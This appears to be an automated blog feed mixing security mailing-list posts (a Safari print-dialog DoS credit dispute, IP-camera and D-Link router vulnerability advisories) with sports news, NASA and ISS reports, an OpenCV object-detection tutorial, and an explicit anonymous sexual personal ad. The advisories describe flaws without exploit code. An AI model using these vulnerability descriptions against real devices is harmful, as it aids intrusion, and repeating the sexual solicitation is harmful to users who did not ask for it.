Hello participants of Mailing List. I'll tell you how Apple fixed my 2008's hole in their browser after 9 years. They did it in very lame manner. There are many vulnerabilities in Safari (mobile and desktop), such as DoS and XSS vulnerabilities. During 2016-2017 I wrote to Apple, that found these holes in Safari for iOS 6.x, 8.x and 10.x. Particularly I wrote about a lot of DoS by blocking, resource consumption, freezing and crashing. As I wrote to Apple at 06.06.2017, I checked at 04.06.2017 previous vulnerabilities in Safari 10.0.2 and 10.3.2 for iOS. Which in January 2016 checked in Safari 6.0.1 and 8.4.1 for iOS. They still not fixed those vulnerabilities. So I found that many of them, that affected 8.x, still affect 10.x version. For example multiple Denial of Service and Cross-Site Scripting vulnerability (for bypassing XSS filters). One of these holes is blocking DoS by print dialog. I found it in 2008, as you can see in my posts, that have links to exploits that I published in those years. This is my post from 04.06.2017 for Safari 10 for iOS (http://ift.tt/2wlZctq) with exploit, that I made and published at 17.10.2008 - similar holes I found in different browsers, such as Mozilla Firefox, Opera and Google Chrome (http://ift.tt/2wXnEoK) and called it printing DoS attack. Here is my 2008's post to security mailing list: DoS vulnerabilities in Mozilla, Internet Explorer, Google Chrome and Opera (http://ift.tt/2wmhb2X). http://ift.tt/2wWxO8S This exploit completely blocks browser. In October 2008 I wrote my article Classification of DoS vulnerabilities in browsers. On two languages - on Ukrainian (at 18.10.2008) and on English (at 22.10.2008 http://ift.tt/2wlRDmB). Where I told about all above-mentioned variants of DoS vulnerabilities in browsers, including blocking DoS, one of which is blocking by printing dialog (in those years I made exploits for all variants of dialogs in browsers to conduct DoS attacks). And in this article I summarize it - even without mentioned Safari, but I told that all browsers are vulnerable (that support appropriate dialog windows). So already 9 years ago I told all browser developers, that their software are vulnerable, but all of them ignored it. In July I read advisory (http://ift.tt/2uKX3LB) about holes in Safari, where I found that Apple fixed DoS by printing dialog. They called it "CVE-2017-7060". The hole that I found in all browsers (with print functionality) already in 2008 and wrote about it in above-mentioned advisory and in my article in 2008. And told Apple about it many times during 2016-2017. But they lamerly ignored and lamerly draw attention only to message from Travis Kelley, but not to all my posts, articles and letters for 9 years! In that advisory mentioned desktop Safari, but mobile version is the same vulnerable (I tested on Safari for iOS). So in July I suggested Apple to fix both versions. Apple answered me, that this issue is different. This is not different issue. CVE-2017-7060 is the same issue with print dialogs, that I found and created exploit nine yeas ago. Since there is only one possible attack on browsers with printing dialog. To put infinite print dialog window, that blocks browser. This attack and all other blocking attacks on all browsers I developed in 2008 (and some in other years). Particularly my attack with printing dialog I published at 17.10.2008 and called it "printing DoS attack". And mentioned about this kind of attacks in my 2008's article Classification of DoS vulnerabilities in browsers. Best wishes & regards, MustLive Administrator of Websecurity web site http://ift.tt/1H884q9

Source: Gmail -> IFTTT-> Blogger

[FD] R.I.P. Kaspersky Privacy Cleaner: withdrawn due to multiple begiinner's errors which allow escalation of privilege

[FD] Access control bypass in Hikvision IP Cameras

Access control bypass in Hikvision IP Cameras Full disclosure Sep 12, 2017 Synopsis:

Source: Gmail -> IFTTT-> Blogger

Orioles: C Welington Castillo sent to hospital for tests after taking foul ball to groin (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] SSD Advisory – Hanbanggaoke IP Camera Arbitrary Password Change

SSD Advisory – Hanbanggaoke IP Camera Arbitrary Password Change Full report: http://ift.tt/2vQ0b5y Twitter: @SecuriTeam_SSD Weibo: SecuriTeam_SSD Vulnerability summary The following advisory describes an arbitrary password change vulnerability found in Hanbanggaoke webcams. Beijing Hanbang Technology, “one of the first enterprises entering into digital video surveillance industry, has been focusing on R&D of products and technology of digital video surveillance field. While providing product and technical support, it also provides overall solution for the industrial system; it has successfully provided system implementation and service supports for several industries.” Credit An independent security researcher, Netfairy, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program Vendor response We tried to contact Hanbanggaoke since the 8th of August 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.

Source: Gmail -> IFTTT-> Blogger

GPM Examines Hurricane Irma

The GPM core observatory satellite had an exceptional view of hurricane Irma's eye when it flew above it on September 5, 2017 at 12:52 PM AST (1652 UTC). This visualization shows a rainfall analysis that was derived from GPM's Microwave Imager (GMI) and Dual-Frequency Precipitation Radar (DPR) data. Irma was approaching the Leeward Islands with maximum sustained winds of about 178 mph (155 kts). This made Irma a dangerous category five hurricane on the Saffir-Simpson hurricane wind scale. Intense rainfall is shown within Irma's nearly circular eye. This 3-D cross-section through Irma's eye was constructed using GPM's radar (DPR Ku band) data. GPM's radar revealed that the heavy precipitation rotating around the eye was reaching altitudes greater than 7.75 miles (12.5 km). The tallest thunderstorms were found by GPM's radar in a feeder band that was located to the southwest of Irma's eye. These extreme storms were reaching heights of over 10.0 miles (16.2 km). Intense downpours in the eye wall were found to be returning radar reflectivity values of over 80dBZ to the GPM satellite. Irma rapidly intensified on September 4-5 as it moved over very warm waters and into an environment will weak vertical wind shear (the change of winds with height). Irma maintained maximum winds of 185 mph for a day and a half, making it one of the longest-lived storms at this intensity. That intensity made it the strongest observed storm over the Atlantic Ocean (excluding the Gulf of Mexico and Caribbean). Irma's rapid intensification was very similar to Hurricane Harvey's in the Gulf about 10 days earlier.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2xh6qTF
via IFTTT

Monday, September 11, 2017

Very dark room, anonymous bj

Want to have a guy give me great oral in a VERY DARK ROOM, very anonymous. We would not see each other. If you are into it, please write.

from Google Alert - anonymous http://ift.tt/2xs3J2D
via IFTTT

📷 Eric Weddle continues tradition of downing lots of ice cream after Ravens win (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Facebook slapped with $1.43 million fine for violating users' privacy in Spain

Facebook is once again in trouble regarding its users' privacy. The social media giant has recently been heavily fined once again for a series of privacy violations in Spain. Recently, Google also incurred a record-breaking fine of $2.7 billion (€2.42 billion) by the European antitrust officials for unfairly manipulating search results since at least 2008. <!-- adsense --> Now, the Spanish


from The Hacker News http://ift.tt/2gYqi4h
via IFTTT

Object detection with deep learning and OpenCV

A couple weeks ago we learned how to classify images using deep learning and OpenCV 3.3’s deep neural network (

dnn
 ) module.

While this original blog post demonstrated how we can categorize an image into one of ImageNet’s 1,000 separate class labels it could not tell us where an object resides in image.

In order to obtain the bounding box (x, y)-coordinates for an object in a image we need to instead apply object detection.

Object detection can not only tell us what is in an image but also where the object is as well.

In the remainder of today’s blog post we’ll discuss how to apply object detection using deep learning and OpenCV.

Looking for the source code to this post?
Jump right to the downloads section.

Object detection with deep learning and OpenCV

In the first part of today’s post on object detection using deep learning we’ll discuss Single Shot Detectors and MobileNets.

When combined together these methods can be used for super fast, real-time object detection on resource constrained devices (including the Raspberry Pi, smartphones, etc.)

From there we’ll discover how to use OpenCV’s

dnn
  module to load a pre-trained object detection network.

This will enable us to pass input images through the network and obtain the output bounding box (x, y)-coordinates of each object in the image.

Finally we’ll look at the results of applying the MobileNet Single Shot Detector to example input images.

In a future blog post we’ll extend our script to work with real-time video streams as well.

Single Shot Detectors for object detection

Figure 1: Examples of object detection using Single Shot Detectors (SSD) from Liu et al.

When it comes to deep learning-based object detection there are three primary object detection methods that you’ll likely encounter:

Faster R-CNNs are likely the most “heard of” method for object detection using deep learning; however, the technique can be difficult to understand (especially for beginners in deep learning), hard to implement, and challenging to train.

Furthermore, even with the “faster” implementation R-CNNs (where the “R” stands for “Region Proposal”) the algorithm can be quite slow, on the order of 7 FPS.

If we are looking for pure speed then we tend to use YOLO as this algorithm is much faster, capable of processing 40-90 FPS on a Titan X GPU. The super fast variant of YOLO can even get up to 155 FPS.

The problem with YOLO is that it leaves much accuracy to be desired.

SSDs, originally developed by Google, are a balance between the two. The algorithm is more straightforward (and I would argue better explained in the original seminal paper) than Faster R-CNNs.

We can also enjoy a much faster FPS throughput than Girshick et al. at 22-46 FPS depending on which variant of the network we use. SSDs also tend to be more accurate than YOLO. To learn more about SSDs, please refer to Liu et al.

MobileNets: Efficient (deep) neural networks

Figure 2: (Left) Standard convolutional layer with batch normalization and ReLU. (Right) Depthwise separable convolution with depthwise and pointwise layers followed by batch normalization and ReLU (figure and caption from Liu et al.).

When building object detection networks we normally use an existing network architecture, such as VGG or ResNet, and then use it inside the object detection pipeline. The problem is that these network architectures can be very large in the order of 200-500MB.

Network architectures such as these are unsuitable for resource constrained devices due to their sheer size and resulting number of computations.

Instead, we can use MobileNets (Howard et al., 2017), another paper by Google researchers. We call these networks “MobileNets” because they are designed for resource constrained devices such as your smartphone. MobileNets differ from traditional CNNs through the usage of depthwise separable convolution (Figure 2 above).

The general idea behind depthwise separable convolution is to split convolution into two stages:

  1. A 3×3 depthwise convolution.
  2. Followed by a 1×1 pointwise convolution.

This allows us to actually reduce the number of parameters in our network.

The problem is that we sacrifice accuracy — MobileNets are normally not as accurate as their larger big brothers…

…but they are much more resource efficient.

For more details on MobileNets please see Howard et al.

Combining MobileNets and Single Shot Detectors for fast, efficient deep-learning based object detection

If we combine both the MobileNet architecture and the Single Shot Detector (SSD) framework, we arrive at a fast, efficient deep learning-based method to object detection.

The model we’ll be using in this blog post is a Caffe version of the original TensorFlow implementation by Howard et al. and was trained by chuanqi305 (see GitHub).

The MobileNet SSD was first trained on the COCO dataset (Common Objects in Context) and was then fine-tuned on PASCAL VOC reaching 72.7% mAP (mean average precision).

We can therefore detect 20 objects in images (+1 for the background class), including airplanes, bicycles, birds, boats, bottles, buses, cars, cats, chairs, cows, dining tables, dogs, horses, motorbikes, people, potted plants, sheep, sofas, trains, and tv monitors.

Deep learning-based object detection with OpenCV

In this section we will use the MobileNet SSD + deep neural network (

dnn
 ) module in OpenCV to build our object detector.

I would suggest using the “Downloads” code at the bottom of this blog post to download the source code + trained network + example images so you can test them on your machine.

Let’s go ahead and get started building our deep learning object detector using OpenCV.

Open up a new file, name it

deep_learning_object_detection.py
 , and insert the following code:
# import the necessary packages
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
ap.add_argument("-p", "--prototxt", required=True,
        help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=True,
        help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.2,
        help="minimum probability to filter weak detections")
args = vars(ap.parse_args())

On Lines 2-4 we import packages required for this script — the

dnn
  module is included in
cv2
, again, making hte assumption that you’re using OpenCV 3.3.

Then, we parse our command line arguments (Lines 7-16):

  • --image
    
     : The path to the input image.
  • --prototxt
    
     : The path to the Caffe prototxt file.
  • --model
    
     : The path to the pre-trained model.
  • --confidence
    
     : The minimum probability threshold to filter weak detections. The default is 20%.

Again, example files for the first three arguments are included in the “Downloads” section of this blog post. I urge you to start there while also supplying some query images of your own.

Next, let’s initialize class labels and bounding box colors:

# initialize the list of class labels MobileNet SSD was trained to
# detect, then generate a set of bounding box colors for each class
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
        "bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
        "dog", "horse", "motorbike", "person", "pottedplant", "sheep",
        "sofa", "train", "tvmonitor"]
COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))

Lines 20-23 build a list called

CLASSES
  containing our labels. This is followed by a list,
COLORS
  which contains corresponding random colors for bounding boxes (Line 24).

Now we need to load our model:

# load our serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])

The above lines are self-explanatory, we simply print a message and load our

model
  (Lines 27 and 28).

Next, we will load our query image and prepare our

blob
 , which we will feed-forward through the network:
# load the input image and construct an input blob for the image
# by resizing to a fixed 300x300 pixels and then normalizing it
# (note: normalization is done via the authors of the MobileNet SSD
# implementation)
image = cv2.imread(args["image"])
(h, w) = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 0.007843, (300, 300), 127.5)

Taking note of the comment in this block, we load our

image
  (Line 34), extract the height and width (Line 35), and calculate a 300 by 300 pixel
blob
  from our image (Line 36).

Now we’re ready to do the heavy lifting — we’ll pass this blog through the neural network:

# pass the blob through the network and obtain the detections and
# predictions
print("[INFO] computing object detections...")
net.setInput(blob)
detections = net.forward()

On Lines 41 and 42 we set the input to the network and compute the forward pass for the input, storing the result as

detections
 . Computing the forward pass and associated detections could take awhile depending on your model and input size, but for this example it will be relatively quick on most CPUs.

Let’s loop through our

detections
  and determine what and where the objects are in the image:
# loop over the detections
for i in np.arange(0, detections.shape[2]):
        # extract the confidence (i.e., probability) associated with the
        # prediction
        confidence = detections[0, 0, i, 2]

        # filter out weak detections by ensuring the `confidence` is
        # greater than the minimum confidence
        if confidence > args["confidence"]:
                # extract the index of the class label from the `detections`,
                # then compute the (x, y)-coordinates of the bounding box for
                # the object
                idx = int(detections[0, 0, i, 1])
                box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
                (startX, startY, endX, endY) = box.astype("int")

                # display the prediction
                label = "{}: {:.2f}%".format(CLASSES[idx], confidence * 100)
                print("[INFO] {}".format(label))
                cv2.rectangle(image, (startX, startY), (endX, endY),
                        COLORS[idx], 2)
                y = startY - 15 if startY - 15 > 15 else startY + 15
                cv2.putText(image, label, (startX, y),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)

We start by looping over our detections, keeping in mind that multiple objects can be detected in a single image. We also apply a check to the confidence (i.e., probability) associated with each detection. If the confidence is high enough (i.e. above the threshold), then we’ll display the prediction in the terminal as well as draw the prediction on the image with text and a colored bounding box. Let’s break it down line-by-line:

Looping through our

detections
 , first we extract the
confidence
  value (Line 48).

If the

confidence
  is above our minimum threshold (Line 52), we extract the class label index (Line 56) and compute the bounding box around the detected object (Line 57).

Then, we extract the (x, y)-coordinates of the box (Line 58) which we will will use shortly for drawing a rectangle and displaying text.

Next, we build a text

label
  containing the
CLASS
  name and the
confidence
  (Line 61).

Using the label, we print it to the terminal (Line 62), followed by drawing a colored rectangle around the object using our previously extracted (x, y)-coordinates (Lines 63 and 64).

In general, we want the label to be displayed above the rectangle, but if there isn’t room, we’ll display it just below the top of the rectangle (Line 65).

Finally, we overlay the colored text onto the

image
  using the y-value that we just calculated (Lines 66 and 67).

The only remaining step is to display the result:

# show the output image
cv2.imshow("Output", image)
cv2.waitKey(0)

We display the resulting output image to the screen until a key is pressed (Lines 70 and 71).

OpenCV and deep learning object detection results

To download the code + pre-trained network + example images, be sure to use the “Downloads” section at the bottom of this blog post.

From there, unzip the archive and execute the following command:

$ python deep_learning_object_detection.py \
        --prototxt MobileNetSSD_deploy.prototxt.txt \
        --model MobileNetSSD_deploy.caffemodel --image images/example_01.jpg 
[INFO] loading model...
[INFO] computing object detections...
[INFO] loading model...
[INFO] computing object detections...
[INFO] car: 99.78%
[INFO] car: 99.25%

Figure 3: Two Toyotas on the highway recognized with near-100% confidence using OpenCV, deep learning, and object detection.

Our first result shows cars recognized and detected with near-100% confidence.

In this example we detect an airplane using deep learning-based object detection:

$ python deep_learning_object_detection.py \
        --prototxt MobileNetSSD_deploy.prototxt.txt \
        --model MobileNetSSD_deploy.caffemodel --image images/example_02.jpg 
[INFO] loading model...
[INFO] computing object detections...
[INFO] loading model...
[INFO] computing object detections...
[INFO] aeroplane: 98.42%

Figure 4: An airplane successfully detected with high confidence via Python, OpenCV, and deep learning.

The ability for deep learning to detect and localize obscured objects is demonstrated in the following image, where we see a horse (and it’s rider) jumping a fence flanked by two potted plants:

$ python deep_learning_object_detection.py \
        --prototxt MobileNetSSD_deploy.prototxt.txt \
        --model MobileNetSSD_deploy.caffemodel --image images/example_03.jpg
[INFO] loading model...
[INFO] computing object detections...
[INFO] horse: 96.67%
[INFO] person: 92.58%
[INFO] pottedplant: 96.87%
[INFO] pottedplant: 34.42%

Figure 5: A person riding a horse and two potted plants are successfully identified despite a lot of objects in the image via deep learning-based object detection.

In this example we can see a beer bottle is detected with an impressive 100% confidence:

$ python deep_learning_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt \
        --model MobileNetSSD_deploy.caffemodel --image images/example_04.jpg 
[INFO] loading model...
[INFO] computing object detections...
[INFO] bottle: 100.00%

Figure 6: Deep learning + OpenCV are able to correctly detect a beer bottle in an input image.

Followed by another horse image which also contains a dog, car, and person:

$ python deep_learning_object_detection.py \
        --prototxt MobileNetSSD_deploy.prototxt.txt \
        --model MobileNetSSD_deploy.caffemodel --image images/example_05.jpg 
[INFO] loading model...
[INFO] computing object detections...
[INFO] car: 99.87%
[INFO] dog: 94.88%
[INFO] horse: 99.97%
[INFO] person: 99.88%

Figure 7: Several objects in this image including a car, dog, horse, and person are all recognized.

Finally, a picture of me and Jemma, the family beagle:

$ python deep_learning_object_detection.py \
        --prototxt MobileNetSSD_deploy.prototxt.txt \
        --model MobileNetSSD_deploy.caffemodel --image images/example_06.jpg 
[INFO] loading model...
[INFO] computing object detections...
[INFO] dog: 95.88%
[INFO] person: 99.95%

Figure 8: Me and the family beagle are corrected as a “person” and a “dog” via deep learning, object detection, and OpenCV. The TV monitor is not recognized.

Unfortunately the TV monitor isn’t recognized in this image which is likely due to (1) me blocking it and (2) poor contrast around the TV. That being said, we have demonstrated excellent object detection results using OpenCV’s

dnn
  module.

Summary

In today’s blog post we learned how to perform object detection using deep learning and OpenCV.

Specifically, we used both MobileNets + Single Shot Detectors along with OpenCV 3.3’s brand new (totally overhauled)

dnn
  module to detect objects in images.

As a computer vision and deep learning community we owe a lot to the contributions of Aleksandr Rybnikov, the main contributor to the

dnn
  module for making deep learning so accessible from within the OpenCV library. You can find Aleksandr’s original OpenCV example script here — I have modified it for the purposes of this blog post.

In a future blog post I’ll be demonstrating how we can modify today’s tutorial to work with real-time video streams, thus enabling us to perform deep learning-based object detection to videos. We’ll be sure to leverage efficient frame I/O to increase the FPS throughout our pipeline as well.

To be notified when future blog posts (such as the real-time object detection tutorial) are published here on PyImageSearch, simply enter your email address in the form below.

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post Object detection with deep learning and OpenCV appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2ji8up5
via IFTTT

Raspberry Pi: Learn How to Build Amazing IoT & Robotics Projects at Home

Do you want to make your own robot at home? But, of course, one can not spend hundreds or thousands of dollars, and definitely would not be able to join a 4-year-long engineering institute to learn how to do it? Well, we have good news for you—Try the Raspberry Pi board to create amazing projects at highly affordable cost. <!-- adsense --> Raspberry Pi is a tiny, cheaper and customizable


from The Hacker News http://ift.tt/2xqyOUj
via IFTTT

ISS Daily Summary Report – 9/08/2017

Lighting Effects: The crew completed a visual assessment test in the Crew Quarters (CQs) by setting the light to the correct mode, turning all other light sources in the CQ off, and performing one Numerical Verification Test and one Color Discrimination Test. The crew will then photograph the completed tests, before transferring the photos for downlink. The light bulbs on the ISS are being replaced with a new system designed for improved crew health and wellness. The Lighting Effects investigation studies the impact of the change from fluorescent light bulbs to solid-state light-emitting diodes (LEDs) with adjustable intensity and color and aims to determine if the new lights can improve crew circadian rhythms, sleep, and cognitive performance. Results from this investigation also have major implications for people on Earth who use electric lights. Multi-Omics-Mouse:  Today the crew performed routine maintenance operations by filling the transportation cage units with water and refilling the camera washer water of the Mouse Habitat Cage Unit located in the Cell Biology Experiment Facility (CBEF).  Several studies have reported space flight effects on the human immune system, but the relationship between microbiota and immune dysfunction during flight remains unclear. In the Multi-Omics-Mouse investigation, food with and without fructooligosaccharides (FOS) will be used as prebiotics, to determine if they improve the gut environment and immune function.  After the flight, researchers will analyze the gut environment (microbiota and metabolites) and immune system of the mice by multi-omics analysis. Rodent Research 9 (RR-9):  In support of the on-going RR-9 investigation, the crew restocked the Animal Habitat Units with new food bars and cleaned the lid and interior cages. RR-9 studies how microgravity affects the immune systems, muscles and bones of rodents during extended stays aboard the ISS.  After approximately 30 days aboard the ISS, the mice will be returned to Earth where scientists on the ground will study how their time in space has affected various tissues, including brain, muscle, heart, joints, eyes and the immune system.  MELFI (Minus Eighty Degree Laboratory Freezer for ISS) Electronic Unit Removal: While removing the failed spare Electronic Unit from MELFI-1, which will be 1 of 2 units returned on SpX-12.; the crew found corrosion on the fluid line connector. This activity has been paused until the ground teams can determine a forward plan of action. The MELFI is a cold storage unit that maintains experiment samples at ultra-cold temperatures until those samples can be returned to the ground for analysis. Space Headaches:  The crew completed weekly questionnaires for the ESA Space Headaches investigation today.  The Space Headaches investigation collects information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crewmembers in space. Headaches during space flight can negatively affect mental and physical capacities of crewmembers that can influence performance during a space mission. Today’s Planned Activities All activities were completed unless otherwise noted. ACME Lens Inspection Combustion Integrated Rack Alignment Guide Removal Combustion Integrated Rack MWA Containment System STOW Flight Director/ISS CREW CONFERENCE In Flight Maintenance (IFM) Waste and Hygiene Compartment (WHC) Full Fill Inventory Management System (IMS) Conference iPad iOS update ISS HAM Service Module Pass Lighting Effects Sleep Log Entry – Subject Lighting Effects Visual Performance Tests Light Setting – Subject MELFI # Electronic Unit Removal for Packing Multi-Omics-Mouse Cage Maintenance for Water 5 Multi-Omics-Mouse Transportation Cage Unit Preparation 2 Polar Desiccant Pack Swap TV -conference with the participants of science conference “Future of Medicine – 2017” (Ku + S-band) PAO hardware setup. Video/Audio check.  Rodent Research 9 Access Unit Clean Rodent Research 9 Habitat 3 & 4 Restock SARCOLAB crew conference Space Headaches – Weekly Questionnaire ISS Crew and ГОГУ (RSA Flight Control Team) weekly conference Установка видеооборудования для съемки ФУ на БД-2 Removal of Video Equipment Used to capture БД-2 Exercise and Downlink the file On MCC GO БД-2 Test (Exercise Day 3 Cycle) Changeout of ПФ1 & ПФ2 Dust Filters (ФГБ1ПГО_2_224_1 bag 436-26 (00071452R). Update IMS) and Cleaning В1, В2 Fan Screens in DC1 СОЖ maintenance External inspection and photography [СКВ1] acoustic and thermal insulation. Scheduled ВП-2 Pilot’s Sight Test (СМ1РО_1_113_1). Health Check of the Wide Angle Vertical Sight (ВШТВ) (СМ1РО_1_110_111 Drawer Central Post Small Recess)  IDENTIFICATION. Copy ИМУ-Ц micro-accelerometer data to laptop Completed Task List Activities None Ground Activities All activities were completed unless otherwise noted. None Three-Day Look Ahead: Saturday, 09/09: Lung Tissue Media Fixation, Weekly Housekeeping, Off Duty Sunday, 09/10:  Lung Tissue sample ops, Off Duty Monday, 09/11:  Multi-Omics Mouse, LMM Control Box R&R QUICK ISS Status – Environmental Control Group:   Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On           [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off  

from ISS On-Orbit Status Report http://ift.tt/2wkjUd5
via IFTTT

Researcher Discloses 10 Zero-Day Flaws in D-Link 850L Wireless Routers

A security researcher has discovered not one or two but a total of ten critical zero-day vulnerabilities in routers from Taiwan-based networking equipment manufacturer D-Link which leave users open to cyber attacks. D-Link DIR 850L wireless AC1200 dual-band gigabit cloud routers are vulnerable to 10 security issues, including "several trivial" cross-site scripting (XSS) flaws, lack of proper


from The Hacker News http://ift.tt/2w11jHW
via IFTTT